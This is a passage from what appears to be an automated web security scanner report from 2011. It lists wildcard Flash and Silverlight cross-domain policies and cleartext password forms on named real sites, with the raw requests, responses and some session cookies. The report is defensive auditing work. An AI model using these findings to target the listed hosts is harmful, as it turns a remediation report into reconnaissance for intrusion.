Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: feeds.bbci.co.uk

Response

HTTP/1.0 200 OK
Last-Modified: Wed, 20 Apr 2011 09:07:59 GMT
Server: Apache
Content-Type: text/xml
Cache-Control: max-age=27
Expires: Thu, 12 May 2011 00:09:12 GMT
Date: Thu, 12 May 2011 00:08:45 GMT
Content-Length: 1081
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-o
...[SNIP]...
<allow-access-from domain="downloads.bbc.co.uk" />
   <allow-access-from domain="www.bbcamerica.com" />
   <allow-access-from domain="*.bbcamerica.com" />
   <allow-access-from domain="www.bbc.co.uk" />
   <allow-access-from domain="news.bbc.co.uk" />
   <allow-access-from domain="newsimg.bbc.co.uk"/>
   <allow-access-from domain="nolpreview11.newsonline.tc.nca.bbc.co.uk" />
   <allow-access-from domain="newsrss.bbc.co.uk" />
   <allow-access-from domain="newsapi.bbc.co.uk" />
   <allow-access-from domain="extdev.bbc.co.uk" />
   <allow-access-from domain="stats.bbc.co.uk" />
   <allow-access-from domain="*.bbc.co.uk"/>
   <allow-access-from domain="*.bbci.co.uk"/>
   <allow-access-from domain="*.bbc.com"/>
...[SNIP]...
<allow-access-from domain="jam.bbc.co.uk" />
   <allow-access-from domain="dc01.dc.bbc.co.uk" />
...[SNIP]...

4.17. http://googleads.g.doubleclick.net/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: googleads.g.doubleclick.net

Response

HTTP/1.0 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/x-cross-domain-policy; charset=UTF-8
Last-Modified: Thu, 04 Feb 2010 20:17:40 GMT
Date: Wed, 11 May 2011 19:48:38 GMT
Expires: Thu, 12 May 2011 19:48:38 GMT
X-Content-Type-Options: nosniff
Server: cafe
X-XSS-Protection: 1; mode=block
Cache-Control: public, max-age=86400
Age: 17841

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="maps.gstatic.com" />
<allow-access-from domain="maps.gstatic.cn" />
<allow-access-from domain="*.googlesyndication.com" />
<allow-access-from domain="*.google.com" />
<allow-access-from domain="*.google.ae" />
<allow-access-from domain="*.google.at" />
<allow-access-from domain="*.google.be" />
<allow-access-from domain="*.google.ca" />
<allow-access-from domain="*.google.ch" />
<allow-access-from domain="*.google.cn" />
<allow-access-from domain="*.google.co.il" />
<allow-access-from domain="*.google.co.in" />
<allow-access-from domain="*.google.co.jp" />
<allow-access-from domain="*.google.co.kr" />
<allow-access-from domain="*.google.co.nz" />
<allow-access-from domain="*.google.co.sk" />
<allow-access-from domain="*.google.co.uk" />
<allow-access-from domain="*.google.co.ve" />
<allow-access-from domain="*.google.co.za" />
<allow-access-from domain="*.google.com.ar" />
<allow-access-from domain="*.google.com.au" />
<allow-access-from domain="*.google.com.br" />
<allow-access-from domain="*.google.com.gr" />
<allow-access-from domain="*.google.com.hk" />
<allow-access-from domain="*.google.com.ly" />
<allow-access-from domain="*.google.com.mx" />
<allow-access-from domain="*.google.com.my" />
<allow-access-from domain="*.google.com.pe" />
<allow-access-from domain="*.google.com.ph" />
<allow-access-from domain="*.google.com.pk" />
<allow-access-from domain="*.google.com.ru" />
<allow-access-from domain="*.google.com.sg" />
<allow-access-from domain="*.google.com.tr" />
<allow-access-from domain="*.google.com.tw" />
<allow-access-from domain="*.google.com.ua" />
<allow-access-from domain="*.google.com.vn" />
<allow-access-from domain="*.google.de" />
<allow-access-from domain="*.google.dk" />
<allow-access-from domain="*.google.es" />
<allow-access-from domain="*.google.fi" />
<allow-access-from domain="*.google.fr" />
<allow-access-from domain="*.google.it" />
<allow-access-from domain="*.google.lt" />
<allow-access-from domain="*.google.lv" />
<allow-access-from domain="*.google.nl" />
<allow-access-from domain="*.google.no" />
<allow-access-from domain="*.google.pl" />
<allow-access-from domain="*.google.pt" />
<allow-access-from domain="*.google.ro" />
<allow-access-from domain="*.google.se" />
<allow-access-from domain="*.youtube.com" />
<allow-access-from domain="*.ytimg.com" />
<allow-access-from domain="*.2mdn.net" />
<allow-access-from domain="*.doubleclick.net" />
<allow-access-from domain="*.doubleclick.com" />
...[SNIP]...

4.18. http://nanpa.org/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://nanpa.org
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: nanpa.org

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:03:38 GMT
Server: Apache
Last-Modified: Fri, 03 Apr 2009 17:47:04 GMT
ETag: "b42233-e2-466aa22f81600"
Accept-Ranges: bytes
Content-Length: 226
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR NOR BUS UNI COM NAV INT", policyref="/w3c/p3p.xml"
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.resourcenter.net" />
...[SNIP]...

4.19. http://newsrss.bbc.co.uk/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://newsrss.bbc.co.uk
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: newsrss.bbc.co.uk

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Wed, 20 Apr 2011 09:07:59 GMT
Content-Type: text/xml
Cache-Control: max-age=101
Expires: Thu, 12 May 2011 00:10:25 GMT
Date: Thu, 12 May 2011 00:08:44 GMT
Content-Length: 1081
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-o
...[SNIP]...
<allow-access-from domain="downloads.bbc.co.uk" />
   <allow-access-from domain="www.bbcamerica.com" />
   <allow-access-from domain="*.bbcamerica.com" />
   <allow-access-from domain="www.bbc.co.uk" />
   <allow-access-from domain="news.bbc.co.uk" />
   <allow-access-from domain="newsimg.bbc.co.uk"/>
   <allow-access-from domain="nolpreview11.newsonline.tc.nca.bbc.co.uk" />
...[SNIP]...
<allow-access-from domain="newsapi.bbc.co.uk" />
   <allow-access-from domain="extdev.bbc.co.uk" />
   <allow-access-from domain="stats.bbc.co.uk" />
   <allow-access-from domain="*.bbc.co.uk"/>
   <allow-access-from domain="*.bbci.co.uk"/>
   <allow-access-from domain="*.bbc.com"/>
...[SNIP]...
<allow-access-from domain="jam.bbc.co.uk" />
   <allow-access-from domain="dc01.dc.bbc.co.uk" />
...[SNIP]...

4.20. http://support.sprint.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://support.sprint.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: support.sprint.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:46:04 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: TLTSID=37A49F687C31107C04C5A75B3A5FEB23; Path=/; Domain=.sprint.com
Set-Cookie: Apache=173.193.214.243.1305161164990996; path=/
Last-Modified: Thu, 13 May 2010 20:15:53 GMT
Accept-Ranges: bytes
Content-Length: 313
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/xml

<?xml version="1.0" ?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.sprint.com" secure="false" />
...[SNIP]...

4.21. http://w.sharethis.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://w.sharethis.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: w.sharethis.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.14 (Ubuntu)
Last-Modified: Fri, 06 May 2011 17:23:38 GMT
ETag: "30106-14a-4a29ec0155a80"
Content-Type: application/xml
Date: Thu, 12 May 2011 01:07:14 GMT
Content-Length: 330
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-only"
...[SNIP]...
<allow-access-from domain="*.meandmybadself.com" />
<allow-access-from domain="*.sharethis.com" />
...[SNIP]...

4.22. http://www.awltovhc.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.awltovhc.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.awltovhc.com

Response

HTTP/1.0 200 OK
Server: Resin/3.1.8
Content-Type: text/xml
Date: Thu, 12 May 2011 00:05:02 GMT

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
<allow-access-from domain="www.supersavvyme.com" />
<allow-access-from domain="*.intuit.com" />
<allow-access-from domain="www.dim.fr" />
<allow-access-from domain="*.dim-privileges.com" />
<allow-access-from domain="*.konbini.com" />
<allow-access-from domain="*.loomisdev.com" />
<allow-access-from domain="*.loomisgroup.com" />
...[SNIP]...

4.23. http://www.dslreports.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.dslreports.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.dslreports.com

Response

HTTP/1.1 200 OK
Server: nginx
Date: Thu, 12 May 2011 00:45:47 GMT
Content-Type: text/xml
Content-Length: 393
Last-Modified: Wed, 07 May 2008 23:58:53 GMT
Connection: close
Accept-Ranges: bytes

<cross-domain-policy>
<allow-access-from domain="www.targetscope.com" />
<allow-access-from domain="www.broadbandreports.com" />
<allow-access-from domain="www.dslreports.com" />
<allow-access-from domain="dev.dslreports.com" />
<allow-access-from domain="www.aggiejy.com" />
<allow-access-from domain="216.254.95.41" />
<allow-access-from domain="*.catt.com" />
...[SNIP]...

4.24. http://www.facebook.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.facebook.com

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy;charset=utf-8
X-FB-Server: 10.54.151.61
Connection: close
Content-Length: 1473

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-only" /
...[SNIP]...
<allow-access-from domain="s-static.facebook.com" />
   <allow-access-from domain="static.facebook.com" />
   <allow-access-from domain="static.api.ak.facebook.com" />
   <allow-access-from domain="*.static.ak.facebook.com" />
   <allow-access-from domain="s-static.thefacebook.com" />
   <allow-access-from domain="static.thefacebook.com" />
   <allow-access-from domain="static.api.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.fbcdn.com" />
   <allow-access-from domain="s-static.ak.fbcdn.net" />
   <allow-access-from domain="*.static.ak.fbcdn.net" />
   <allow-access-from domain="s-static.ak.facebook.com" />
...[SNIP]...
<allow-access-from domain="www.new.facebook.com" />
   <allow-access-from domain="register.facebook.com" />
   <allow-access-from domain="login.facebook.com" />
   <allow-access-from domain="ssl.facebook.com" />
   <allow-access-from domain="secure.facebook.com" />
   <allow-access-from domain="ssl.new.facebook.com" />
   <allow-access-from domain="static.ak.fbcdn.net" />
   <allow-access-from domain="fvr.facebook.com" />
   <allow-access-from domain="www.latest.facebook.com" />
   <allow-access-from domain="www.inyour.facebook.com" />
...[SNIP]...

4.25. http://www.nanpa.org/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.nanpa.org
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.nanpa.org

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:03:57 GMT
Server: Apache
Last-Modified: Fri, 03 Apr 2009 17:47:04 GMT
ETag: "b42233-e2-466aa22f81600"
Accept-Ranges: bytes
Content-Length: 226
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR NOR BUS UNI COM NAV INT", policyref="/w3c/p3p.xml"
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.resourcenter.net" />
...[SNIP]...

4.26. http://www.stumbleupon.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.stumbleupon.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.stumbleupon.com

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Mon, 18 Oct 2010 23:13:33 GMT
Content-Type: application/xml
Content-Length: 460
Date: Thu, 12 May 2011 00:46:54 GMT
Age: 0
Via: 1.1 varnish
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
   <allow-access-from domain="www.stumbleupon.com" />
   <allow-access-from domain="*.stumble.net" />
   <allow-access-from domain="stumble.net" />
   <allow-access-from domain="*.stumbleupon.com" />
   <allow-access-from domain="stumbleupon.com" />
   <allow-access-from domain="cdn.stumble-upon.com" />
...[SNIP]...

4.27. http://anpisolutions.app4.hubspot.com/crossdomain.xml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://anpisolutions.app4.hubspot.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: anpisolutions.app4.hubspot.com

Response

HTTP/1.1 200 OK
Content-Length: 206
Content-Type: text/xml
Last-Modified: Wed, 17 Oct 2007 22:47:20 GMT
Accept-Ranges: bytes
ETag: "04cb8acf11c81:cb38"
Server: Microsoft-IIS/6.0
P3P: policyref="http://www.hubspot.com/w3c/p3p.xml", CP="CURa ADMa DEVa TAIa PSAa PSDa OUR IND DSP NON COR"
X-Powered-By: ASP.NET
Date: Thu, 12 May 2011 00:46:22 GMT
Connection: close
Set-Cookie: HUBSPOT95=521213100.0.0000; path=/

<?xml version="1.0" ?>
<!DOCTYPE cross-domain-policy (View Source for full doctype...)>
- <cross-domain-policy>
<allow-access-from domain="www.bluemedia.com" secure="true" />
</cross-domain-p
...[SNIP]...

4.28. http://i.dslr.net/crossdomain.xml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://i.dslr.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: i.dslr.net

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Accept-Ranges: bytes
ETag: "1321405504"
Last-Modified: Wed, 13 Jun 2007 02:10:02 GMT
Content-Length: 239
Connection: close
Date: Thu, 12 May 2011 00:45:55 GMT
Server: lighttpd/1.4.28

<cross-domain-policy>
<allow-access-from domain="www.broadbandreports.com"/>
<allow-access-from domain="www.dslreports.com"/>
<allow-access-from domain="dev.dslreports.com"/>
<allow-access-from domain
...[SNIP]...

4.29. http://twitter.com/crossdomain.xml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: twitter.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:49:03 GMT
Server: Apache
Set-Cookie: k=173.193.214.243.1305161343531352; path=/; expires=Thu, 19-May-11 00:49:03 GMT; domain=.twitter.com
Last-Modified: Wed, 04 May 2011 17:32:26 GMT
Accept-Ranges: bytes
Content-Length: 561
Cache-Control: max-age=1800
Expires: Thu, 12 May 2011 01:19:03 GMT
Vary: Accept-Encoding
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Connection: close
Content-Type: application/xml

<?xml version="1.0" encoding="UTF-8"?>
<cross-domain-policy xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:noNamespaceSchemaLocation="http://www.adobe.com/xml/schemas/PolicyFile.xsd">
<al
...[SNIP]...
<allow-access-from domain="api.twitter.com" />
   <allow-access-from domain="search.twitter.com" />
   <allow-access-from domain="static.twitter.com" />
...[SNIP]...

4.30. http://www.vonage.com/crossdomain.xml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vonage.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.vonage.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:50:30 GMT
Server: Apache
Last-Modified: Thu, 21 Feb 2008 11:50:31 GMT
ETag: "2046e4-bf-446a9b66f2fc0"
Accept-Ranges: bytes
Content-Length: 191
Connection: close
Content-Type: application/xml

<?xml version="1.0" encoding="utf-8"?>
<cross-domain-policy>
<allow-access-from domain="www.vonage-media.co.uk" />
<allow-access-from domain="vonage-media.co.uk" />
</cross-domain-policy>

5. Silverlight cross-domain policy
There are 5 instances of this issue:

Issue background

The Silverlight cross-domain policy controls whether Silverlight client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Silverlight cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.


5.1. http://ad.doubleclick.net/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: ad.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/xml
Content-Length: 314
Last-Modified: Wed, 21 May 2008 19:54:04 GMT
Date: Thu, 12 May 2011 00:47:35 GMT

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*"/>
</allow-from>
<grant-to>
<resource
...[SNIP]...

5.2. http://b.scorecardresearch.com/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: b.scorecardresearch.com

Response

HTTP/1.0 200 OK
Last-Modified: Thu, 15 Oct 2009 22:41:14 GMT
Content-Type: application/xml
Expires: Fri, 13 May 2011 01:07:20 GMT
Date: Thu, 12 May 2011 01:07:20 GMT
Content-Length: 320
Connection: close
Cache-Control: private, no-transform, max-age=86400
Server: CS

<?xml version="1.0" encoding="utf-8" ?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*" />
</allow-from>
<grant-to>
<resou
...[SNIP]...

5.3. http://metrics.connectedplanetonline.com/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://metrics.connectedplanetonline.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: metrics.connectedplanetonline.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:47:47 GMT
Server: Omniture DC/2.0.0
xserver: www70
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...

5.4. http://metrics.sprint.com/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://metrics.sprint.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: metrics.sprint.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:46:32 GMT
Server: Omniture DC/2.0.0
xserver: www138
Content-Length: 263
Keep-Alive: timeout=15
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...

5.5. http://metrics.vonage.com/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://metrics.vonage.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: metrics.vonage.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:50:42 GMT
Server: Omniture DC/2.0.0
xserver: www19
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...

6. Cleartext submission of password
There are 2 instances of this issue:

Issue background

Passwords submitted over an unencrypted connection are vulnerable to capture by an attacker who is suitably positioned on the network. This includes any malicious party located on the user's own network, within their ISP, within the ISP used by the application, and within the application's hosting infrastructure. Even if switched networks are employed at some of these locations, techniques exist to circumvent this defence and monitor the traffic passing through switches.

Issue remediation

The application should use transport-level encryption (SSL or TLS) to protect all sensitive communications passing between the client and the server. Communications that should be protected include the login mechanism and related functionality, and any functions where sensitive data can be accessed or privileged actions can be performed. These areas of the application should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications. If HTTP cookies are used for transmitting session tokens, then the secure flag should be set to prevent transmission over clear-text HTTP.


6.1. http://forum.link2voip.com/favicon.ico

Summary

Severity:   High
Confidence:   Certain
Host:   http://forum.link2voip.com
Path:   /favicon.ico

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET /favicon.ico HTTP/1.1
Host: forum.link2voip.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: phpbb3_82ha5_u=1; phpbb3_82ha5_k=; phpbb3_82ha5_sid=c8a27ebe829b8494c7b1d53ed606faba

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:45:01 GMT
Content-type: text/html; charset=UTF-8
Cache-Control: private, no-cache="set-cookie"
Expires: 0
Pragma: no-cache
Content-Length: 39662

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-gb" xml:lang="en
...[SNIP]...
<br />
   <form method="post" action="./ucp.php?mode=login">
   <table width="100%" border="0" cellpadding="0" cellspacing="0">
...[SNIP]...
</span> <input class="post" type="password" name="password" size="10" />&nbsp; <span class="gensmall">
...[SNIP]...

6.2. http://www.secviz.org/node/89

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.secviz.org
Path:   /node/89

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET /node/89 HTTP/1.1
Host: www.secviz.org
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
